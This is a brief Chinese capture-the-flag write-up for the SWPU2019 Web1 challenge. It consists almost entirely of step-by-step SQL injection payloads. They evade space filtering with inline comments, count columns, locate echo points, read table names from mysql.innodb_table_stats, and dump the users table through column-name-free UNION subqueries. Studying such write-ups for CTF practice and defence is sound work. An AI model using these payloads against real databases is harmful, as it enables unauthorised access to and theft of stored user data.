来自:
[SWPU2019]Web1
详见博客:
https://blog.csdn.net/plant1234/article/details/124205120
payload如下:
查看行数
1'/**/group/**/by/**/1,'1 ...... 直到 1'/**/group/**/by/**/23,'1报错 也就是说有22行
找出回显点
//找出回显点 -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
说明在2,3处。
获取库名
//查看当前数据库
-1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
获取表名
//用mysql.innodb_table_stats获取表名 -1'/**/union/**/select/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
发现有两张表,先看users表,但是没有字段名。
这里采取无字段名注入:(参考:https://www.jianshu.com/p/dc9af4ca2d06)
获取users有几个字段
//先获取users有几个字段 -1'/**/union/**/select/**/1,(select/**/group_concat(1)/**/from/**/users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
字段值为3。
获取表字段值
第一个字段值:
-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1/**/as/**/b,2,3/**/union/**/select/**/*/**/from/**/users)hack),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
获取第二个字段:
-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3/**/union/**/select/**/*/**/from/**/users)hack),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
查看第三个字段:
-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)hack),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
